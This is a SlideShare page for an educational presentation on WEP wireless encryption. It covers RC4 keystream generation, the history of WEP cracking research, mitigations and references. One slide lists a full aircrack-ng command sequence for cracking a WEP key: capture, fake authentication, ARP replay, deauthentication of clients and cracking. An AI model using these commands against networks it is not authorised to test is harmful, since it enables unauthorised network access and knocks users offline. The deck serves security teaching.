SlideShare a Scribd company logo

Wired equivalent privacy by SecArmour

Download as PPTX, PDF
Sec Armour
Sec Armour

Wired Equivalent Privacy (WEP) is an easily broken security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in September 1999, its intention was to provide data confidentiality comparable to that of a traditional wired network.

Technology
1 of 13
SECURITY BEYOND COMPARE
Wireless Equivalent Privacy Makes Wireless LAN Secure??
WEP Basics  The first encryption scheme made available for wifi  Uses RC4 encryption algorithm  RC4 is a Symmetric Key Encryption method  Available on all access points  Typically used by home users or manufacturing companies
WEP Step 1 :Generating Keystream IV WEP KEY RC4 Algorithm (KSA + PRGA) 64 or 128 bit WEP key Random Keystream
WEP Step 2:Integrity Check Value Variable Size Data ICV 32 Bit CRC-32 DATA ICV
WEP STEP 3:Cipher Text Generation Random Keystream IV CIPHER TEXT DATA ICV
WEP Decryption
WEP: Broken Beyond Repair  2001 The insecurity of 802.11 Mobicom,july 2001     N.Borisov 2001 Weakness in the key sechudling algorithm of RC4,S.Fluhrer,I.Mantin,A.Shamir.Aug 2001(FMS) 2004 Korek Improve on above technique and reduces the complexity of WEP cracking.We now only require around 500,000 packets to break the WEP key. 2005 Andreas Klein introduces more correlations between the RC4 key stream and the key. 2007 PTW extend Andreas technique to further simplify WEP cracking.Now with just around 60,000-90,000 packets it is possible to break
WEP CRACKING  Different Attacks using different logic  Oldest one is finding “Weak IVs” which reveals     information about the WEP key Once you can collect a large number of weak IVs,you can crack the WEP Key Weak IVs are not uniformly distributed in the IV space A weak IV is key dependent This is the reason why it takes some time
Steps To Crack WEP Using Bt5  Put Your Nic Card in Promiscuous mode  #airmon-ng start wlan0  Start sniffing for air traffic  #airodump-ng –w packetCaptured mon0  Do fake authentication attack  #aireplay-ng -1 0 –e SSID –a TargetMac –h MyMac mon0  Run arp request replay attack  #aireplay-ng -3 –b TargetMac –h MyMac mon0  Deauthenticate to collect more arp request response  #aireplay-ng -0 1 –a BSSID –c ClientMAC mon0  Finally now run cracking tool on captured packets  #aircrack-ng packetCaptured
Solutions  Always use authentication in your wireless network  Use MAC ACL mechanism to provide level2 security.  Switch off your beacon broadcast  Use WPA because it is more secure as compared toWEP  And last But not the least….Do not use WEP!!
Reference  Fluhrer, S., Mantin, I., Shamir, A.: Weaknesses in the      key scheduling algorithm of rc4. In: RC4",Proceedings of the 4th Annual Workshop on Selected Areas of Cryptography. (2001) KoreK: http://www.netstumbler.org/f50/chopchopexperimental-wep-attacks-12489/. (2004) KoreK: http://www.netstumbler.org/f18/nextgeneration-wep-attacks-12277/index3.html. (2004) Tews, E., Weinmann, R.P., Pyshkin, A.: Breaking 104 bit wep in less than 60 seconds. CryptoePrint Archive, Report 2007/120 (2007) http://eprint.iacr.org/. Klein, A.: Attacks on the rc4 stream cipher. Des. Codes Cryptography 48(3) (2008) 269-286 Vivek Ramachandran:http://www.securitytube.com/
Wired equivalent privacy by SecArmour

Recommended

WEP
WEPWEP
WEP
nashniv
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
Maghan Das
 
Wired equivalent privacy (wep)
Wired equivalent privacy (wep)Wired equivalent privacy (wep)
Wired equivalent privacy (wep)
akruthi k
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
Hammam Samara
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
Fábio Afonso
 
Wi Fi Security
Wi Fi SecurityWi Fi Security
Wi Fi Security
yousef emami
 
802.11 Wireless, WEP, WPA lecture
802.11 Wireless, WEP, WPA lecture802.11 Wireless, WEP, WPA lecture
802.11 Wireless, WEP, WPA lecture
Martyn Price
 
WEP
WEPWEP
WEP
Sudeep Kulkarni
 

Recommended

WEP
WEPWEP
WEP
nashniv
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
Maghan Das
 
Wired equivalent privacy (wep)
Wired equivalent privacy (wep)Wired equivalent privacy (wep)
Wired equivalent privacy (wep)
akruthi k
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
Hammam Samara
 
Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2Wi-Fi security – WEP, WPA and WPA2
Wi-Fi security – WEP, WPA and WPA2
Fábio Afonso
 
Wi Fi Security
Wi Fi SecurityWi Fi Security
Wi Fi Security
yousef emami
 
802.11 Wireless, WEP, WPA lecture
802.11 Wireless, WEP, WPA lecture802.11 Wireless, WEP, WPA lecture
802.11 Wireless, WEP, WPA lecture
Martyn Price
 
WEP
WEPWEP
WEP
Sudeep Kulkarni
 
Iuwne10 S04 L05
Iuwne10 S04 L05Iuwne10 S04 L05
Iuwne10 S04 L05
Ravi Ranjan
 
WEP/WPA attacks
WEP/WPA attacksWEP/WPA attacks
WEP/WPA attacks
Huda Seyam
 
Wi fi protected-access
Wi fi protected-accessWi fi protected-access
Wi fi protected-access
bhanu4ugood1
 
Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
Nzava Luwawa
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
SecurityTube.Net
 
Wi fi security
Wi fi securityWi fi security
Wi fi security
Virendra Thakur
 
Super Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
Super Barcode Training Camp - Motorola AirDefense Wireless Security PresentationSuper Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
Super Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
System ID Warehouse
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network Security
Ayoma Wijethunga
 
Wireless Attacks
Wireless AttacksWireless Attacks
Wireless Attacks
primeteacher32
 
802.11i
802.11i802.11i
802.11i
akruthi k
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
Shahid Beheshti University
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level security
Chetan Kumar S
 
Wireless Network Security
Wireless Network SecurityWireless Network Security
Wireless Network Security
kentquirk
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
Rama Krishna M
 
WPA2
WPA2WPA2
WPA2
Mshari Alabdulkarim
 
Wireless security using wpa2
Wireless security using wpa2Wireless security using wpa2
Wireless security using wpa2
Tushar Anand
 
WPA 3
WPA 3WPA 3
WPA 3
diggu22
 
Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networks
Sahil Rai
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)
Mandeep Jadon
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
Shashank Srivastava
 
Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11b
guestd7b627
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11b
Sreekanth GS
 

More Related Content

What's hot

Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
SecurityTube.Net
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network Security
Ayoma Wijethunga
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
Rama Krishna M
 

What's hot (20)

Iuwne10 S04 L05
Iuwne10 S04 L05Iuwne10 S04 L05
Iuwne10 S04 L05
 
WEP/WPA attacks
WEP/WPA attacksWEP/WPA attacks
WEP/WPA attacks
 
Wi fi protected-access
Wi fi protected-accessWi fi protected-access
Wi fi protected-access
 
Wpa vs Wpa2
Wpa vs Wpa2Wpa vs Wpa2
Wpa vs Wpa2
 
Wifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and DrinkWifi Security, or Descending into Depression and Drink
Wifi Security, or Descending into Depression and Drink
 
Wi fi security
Wi fi securityWi fi security
Wi fi security
 
Super Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
Super Barcode Training Camp - Motorola AirDefense Wireless Security PresentationSuper Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
Super Barcode Training Camp - Motorola AirDefense Wireless Security Presentation
 
Pentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network SecurityPentesting Wireless Networks and Wireless Network Security
Pentesting Wireless Networks and Wireless Network Security
 
Wireless Attacks
Wireless AttacksWireless Attacks
Wireless Attacks
 
802.11i
802.11i802.11i
802.11i
 
Wireless network security
Wireless network securityWireless network security
Wireless network security
 
Wireless Device and Network level security
Wireless Device and Network level securityWireless Device and Network level security
Wireless Device and Network level security
 
Wireless Network Security
Wireless Network SecurityWireless Network Security
Wireless Network Security
 
5169 wireless network_security_amine_k
5169 wireless network_security_amine_k5169 wireless network_security_amine_k
5169 wireless network_security_amine_k
 
WPA2
WPA2WPA2
WPA2
 
Wireless security using wpa2
Wireless security using wpa2Wireless security using wpa2
Wireless security using wpa2
 
WPA 3
WPA 3WPA 3
WPA 3
 
Hacking wireless networks
Hacking wireless networksHacking wireless networks
Hacking wireless networks
 
Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)Hacking Wireless Networks : Null Delhi (November)
Hacking Wireless Networks : Null Delhi (November)
 
Shashank wireless lans security
Shashank wireless lans securityShashank wireless lans security
Shashank wireless lans security
 

Similar to Wired equivalent privacy by SecArmour

4 wifi security
4 wifi security4 wifi security
4 wifi security
al-sari7
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
Mihir Shah
 
Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networks
guestf2e41
 
Wireless security837
Wireless security837Wireless security837
Wireless security837
mark scott
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
amiable_indian
 

Similar to Wired equivalent privacy by SecArmour (20)

Security Issues of 802.11b
Security Issues of 802.11bSecurity Issues of 802.11b
Security Issues of 802.11b
 
Security Issues of IEEE 802.11b
Security Issues of IEEE 802.11bSecurity Issues of IEEE 802.11b
Security Issues of IEEE 802.11b
 
DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting DTS Solution - Wireless Security Protocols / PenTesting
DTS Solution - Wireless Security Protocols / PenTesting
 
How to Hack WiFi on Windows
How to Hack WiFi on Windows How to Hack WiFi on Windows
How to Hack WiFi on Windows
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Aircrack
AircrackAircrack
Aircrack
 
Hacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh JadonHacking Wireless Networks by Mandeep Singh Jadon
Hacking Wireless Networks by Mandeep Singh Jadon
 
A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!A tutorial showing you how to crack wifi passwords using kali linux!
A tutorial showing you how to crack wifi passwords using kali linux!
 
4 wifi security
4 wifi security4 wifi security
4 wifi security
 
Wireless hacking and security
Wireless hacking and securityWireless hacking and security
Wireless hacking and security
 
Wireless hacking
Wireless hackingWireless hacking
Wireless hacking
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEPWireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's more than cracking WEP
 
Wifi Security
Wifi SecurityWifi Security
Wifi Security
 
Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networks
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hacking
 
Viable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be JeopardizedViable means using which Wireless Network Security can be Jeopardized
Viable means using which Wireless Network Security can be Jeopardized
 
Wi fi-security-the-details-matter
Wi fi-security-the-details-matterWi fi-security-the-details-matter
Wi fi-security-the-details-matter
 
Wireless security837
Wireless security837Wireless security837
Wireless security837
 
Cafe Latte
Cafe LatteCafe Latte
Cafe Latte
 
Workshop on Wireless Security
Workshop on Wireless SecurityWorkshop on Wireless Security
Workshop on Wireless Security
 

Recently uploaded

TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
Enterprise Knowledge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Miguel Araújo
 

Recently uploaded (20)

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 

Wired equivalent privacy by SecArmour

  • 2. Wireless Equivalent Privacy Makes Wireless LAN Secure??
  • 3. WEP Basics  The first encryption scheme made available for wifi  Uses RC4 encryption algorithm  RC4 is a Symmetric Key Encryption method  Available on all access points  Typically used by home users or manufacturing companies
  • 4. WEP Step 1 :Generating Keystream IV WEP KEY RC4 Algorithm (KSA + PRGA) 64 or 128 bit WEP key Random Keystream
  • 5. WEP Step 2:Integrity Check Value Variable Size Data ICV 32 Bit CRC-32 DATA ICV
  • 6. WEP STEP 3:Cipher Text Generation Random Keystream IV CIPHER TEXT DATA ICV
  • 8. WEP: Broken Beyond Repair  2001 The insecurity of 802.11 Mobicom,july 2001     N.Borisov 2001 Weakness in the key sechudling algorithm of RC4,S.Fluhrer,I.Mantin,A.Shamir.Aug 2001(FMS) 2004 Korek Improve on above technique and reduces the complexity of WEP cracking.We now only require around 500,000 packets to break the WEP key. 2005 Andreas Klein introduces more correlations between the RC4 key stream and the key. 2007 PTW extend Andreas technique to further simplify WEP cracking.Now with just around 60,000-90,000 packets it is possible to break
  • 9. WEP CRACKING  Different Attacks using different logic  Oldest one is finding “Weak IVs” which reveals     information about the WEP key Once you can collect a large number of weak IVs,you can crack the WEP Key Weak IVs are not uniformly distributed in the IV space A weak IV is key dependent This is the reason why it takes some time
  • 10. Steps To Crack WEP Using Bt5  Put Your Nic Card in Promiscuous mode  #airmon-ng start wlan0  Start sniffing for air traffic  #airodump-ng –w packetCaptured mon0  Do fake authentication attack  #aireplay-ng -1 0 –e SSID –a TargetMac –h MyMac mon0  Run arp request replay attack  #aireplay-ng -3 –b TargetMac –h MyMac mon0  Deauthenticate to collect more arp request response  #aireplay-ng -0 1 –a BSSID –c ClientMAC mon0  Finally now run cracking tool on captured packets  #aircrack-ng packetCaptured
  • 11. Solutions  Always use authentication in your wireless network  Use MAC ACL mechanism to provide level2 security.  Switch off your beacon broadcast  Use WPA because it is more secure as compared toWEP  And last But not the least….Do not use WEP!!
  • 12. Reference  Fluhrer, S., Mantin, I., Shamir, A.: Weaknesses in the      key scheduling algorithm of rc4. In: RC4",Proceedings of the 4th Annual Workshop on Selected Areas of Cryptography. (2001) KoreK: http://www.netstumbler.org/f50/chopchopexperimental-wep-attacks-12489/. (2004) KoreK: http://www.netstumbler.org/f18/nextgeneration-wep-attacks-12277/index3.html. (2004) Tews, E., Weinmann, R.P., Pyshkin, A.: Breaking 104 bit wep in less than 60 seconds. CryptoePrint Archive, Report 2007/120 (2007) http://eprint.iacr.org/. Klein, A.: Attacks on the rc4 stream cipher. Des. Codes Cryptography 48(3) (2008) 269-286 Vivek Ramachandran:http://www.securitytube.com/